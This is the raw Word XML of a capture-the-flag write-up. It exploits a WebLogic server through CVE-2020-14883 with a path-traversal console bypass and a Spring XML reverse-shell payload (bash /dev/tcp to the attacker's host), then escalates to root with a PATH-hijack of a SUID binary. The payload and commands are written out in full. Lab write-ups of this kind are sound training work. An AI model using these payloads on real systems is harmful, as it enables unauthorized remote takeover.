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LOGIC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rbkxaj2p394n"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9fwfsu8sbrj"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413000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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4q5rdb5nylky"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mxn5q88o1cg"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ur4exlnnqmax" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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1">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7001 – WebLogic</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0" l="0" r="0" t="0"/>
            <wp:docPr id="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what </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">returned, we already know that this is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebLogic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server, also confirmed by the machine name (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logic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Oracle </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebLogic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a Java EE application server that is part of Oracle’s Fusion Middleware portfolio and supports several popular databases. WebLogic is extremely popular among Java developers.</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perform directory fuzzing to find the WebLogic console.</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78"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found some directories, and now we will access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console</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940300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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also have a login field for the Administration Console.</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749800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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could try several default credentials such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">weblogic:weblogic, admin:weblogic, admin:admin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guest:guest. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But we would not be successful, so we move to another approach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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see the WebLogic version in the lower-left corner of the page →</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(WebLogic Server Version: 12.2.1.4.0)</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7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searching for vulnerabilities affecting this WebLogic version, we find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2020-14883</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and shortly after I begin searching for exploits and find this PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/murataydemir/CVE-2020-14883</w:t>
        </w:r>
      </w:hyperlink>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easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks may result in full takeover of Oracle WebLogic Server.</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hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf</w:t>
        </w:r>
      </w:hyperlink>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5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reproduce the PoC, which is basically performing a bypass using path traversal with double URL encoding to gain access to the WebLogic Administration Console. After that, we will use other functions to execute our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s go.</w:t>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create our reverse shell payload in XML:</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&lt;beans xmlns="http://www.springframework.org/schema/beans"</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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</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xsi:schemaLocation="http://www.springframework.org/schema/beans</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http://www.springframework.org/schema/beans/spring-beans.xsd"&gt;</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&lt;bean id="pb" class="java.lang.ProcessBuilder" init-method="start"&gt;</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&lt;constructor-arg&gt;</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&lt;list&gt;</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&lt;value&gt;bash&lt;/value&gt;</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&lt;value&gt;-c&lt;/value&gt;</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&lt;![CDATA[bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1]]&gt;</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&lt;/list&gt;</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&lt;/constructor-arg&gt;</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&lt;/bean&gt;</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&lt;/beans&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Python server to serve our payload → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">poc.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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4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2ma5vq1m443w" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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Netcat listener to receive the connection.</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5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perform the bypass to gain access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebLogic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrative console:</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/console/css/%252e%252e%252fconsole.portal</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63900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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Intercept the request with Burp and then send it to Repeater.</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95600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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change the method to POST and pass the payload in the request body, which will execute our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">poc.xml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_nfpb=true&amp;_pageLabel=&amp;handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://&lt;IP-VPN&gt;/poc.xml")</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25800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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receive the connection.</w:t>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81"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z1gf8kg47f1w" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2489200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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3p14rexz5ozn" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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4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home directory of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">oracle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find the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6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are part of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group, so we can enter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 but we cannot read the flag — only the root user can.</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7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of the filesystem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find an interesting directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/internal/publish. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside it, we find a SUID binary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OracleInternalCheck</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5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qp72akvqmg0k" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is SUID?</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(Set User ID) is a type of permission that allows users to execute a file with the permissions of the file owner. Files with SUID permissions run with elevated privileges.</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execute this binary.</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it, it returns the following options:</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1 - Check oracle service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2 - Restart Service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3 - Get current config</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">4 - Exit</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6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trying some of the options without success, I decide to transfer this directory to my machine for dynamic analysis of the binary.</w:t>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23900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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cp -r publish/ /tmp</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/tmp</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 -czvf publish.tar.gz publish/</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Netcat to transfer it to our machine.</w:t>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we have a problem: Netcat is not installed on the server. So first we need to download a static Netcat binary to our machine and then upload it to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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7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7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transfer it to our machine =)</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49"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60"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transferring, we extract it:</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 -xzvf publish.tar.gz</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57500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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smmz8hsso1x5" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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analyzing the binary by selecting the options:</w:t>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1 - Check oracle service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2 - Restart Service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3 - Get current config</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">4 - Exit</w:t>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discover that when selecting option 3, something interesting happens. We will use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strace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strace ./OracleInternalCheck 2&gt; output.txt</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6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output.txt</w:t>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82"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it reading our option (in this case, option 3).</w:t>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More importantly, we notice that it sets the UID to 0 (root).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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69"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Immediately after, it searches for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 — but it does not have a defined PATH. This is good for us.</w:t>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searches for bash in the following locations:</w:t>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1 - /publish/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2 - /usr/local/sbin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3 - /usr/local/bin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">4 - /usr/sbin/bash</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">5 - /usr/bin/bash → HERE IT FINDS IT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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59"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ygz61bdksc0g" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>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m8xqghf8dtxz" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Using the PATH Variable</w:t>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PATH is an environment variable in Linux and Unix systems that specifies directories containing executable programs. When a user runs a command in the terminal, the shell searches these directories in order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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go to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and create a malicious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 with the following content </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ cp /bin/bash /tmp/shell; chmod u+s /tmp/shell</w:t>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Command to create it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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printf '#!/bin/bash\ncp /bin/bash /tmp/shell; chmod u+s /tmp/shell' &gt; bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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+x bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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PATH=$(pwd):$PATH</w:t>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66"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56"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Then go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/internal/publish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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57"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selecting option 3, the shell will be created in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Now we simply execute it with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p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which preserves the SUID privileges: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/shell -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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79"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headerReference r:id="rId45" w:type="default"/>
      <w:headerReference r:id="rId46" w:type="first"/>
      <w:headerReference r:id="rId47" w:type="even"/>
      <w:footerReference r:id="rId48" w:type="default"/>
      <w:footerReference r:id="rId49" w:type="first"/>
      <w:footerReference r:id="rId5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2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="16"/>
    <w:bookmarkEnd w:id="1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1" name="image21.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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93">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94">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0" name="image8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image8.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Logic</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31.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xm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footer" Target="footer1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.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2.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId20" 